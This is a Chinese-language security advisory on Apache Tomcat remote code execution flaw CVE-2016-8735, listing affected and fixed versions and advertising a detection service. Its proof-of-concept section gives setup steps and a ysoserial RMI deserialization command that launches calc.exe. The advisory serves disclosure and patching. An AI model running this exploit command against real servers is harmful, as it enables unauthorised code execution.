时隔十月发布的cve-2016-5425 apache tomcat本地提权漏洞预警不久,近日apache tomcat又被爆出存在远程代码执行漏洞(cve-2016-8735)。
tomcat是运行在apache上的应用服务器,支持运行servlet/jsp应用程序的容器——tomcat可看作是apache的扩展,不过实际上tomcat也可以独立于apache运行。
漏洞编号:
cve-2016-8735
漏洞概述:
oracle修复了jmxremotelifecyclelistener反序列化漏洞(cve-2016-3427)。
tomcat中也使用了jmxremotelifecyclelistener这个监听器,但是tomcat并没有及时升级,所以导致了这个远程代码执行漏洞。
此漏洞在严重程度上被定义为important,而非critical,主要是因为采用此listener的数量并不算大,而且即便此listener被利用,此处jmx端口访问对攻击者而言也相当不寻常。
影响范围:
apache tomcat 9.0.0.m1 to 9.0.0.m11
apache tomcat 8.5.0 to 8.5.6
apache tomcat 8.0.0.rc1 to 8.0.38
apache tomcat 7.0.0 to 7.0.72
apache tomcat 6.0.0 to 6.0.47
修复方案:
升级到不受影响的版本,包括了:
apache tomcat 9.0.0.m13或更新版本 (apache tomcat 9.0.0.m12实际上也修复了此漏洞,但并未发布);
apache tomcat 8.5.8或更新版本 (apache tomcat 8.5.7实际上也修复了此漏洞,但并未发布);
apache tomcat 8.0.39或更新版本;
apache tomcat 7.0.73或更新版本;
apache tomcat 6.0.48或更新版本
漏洞poc:
tomcat 8.0.36,conf/server.xml添加配置,添加catalina-jmx-remote.jar包,修改catalina文件配置:
f:\hacktools\exp>java -cp ysoserial-master-v0.0.4.jar ysoserial.exploit.rmiregistryexploit localhost 10001 groovy1 calc.exe
refer:
http://seclists.org/oss-sec/2016/q4/502
https://vulners.com/f5/sol49820145?utm_source=dlvr.it&utm_medium=twitter
https://marc.ttias.be/varia-announce/2016-11/msg00036.php
在线检测
目前网藤风险感知系统(riskivy.com)已支持该漏洞检测。您可以免费申请试用网藤漏洞感知服务。
试用申请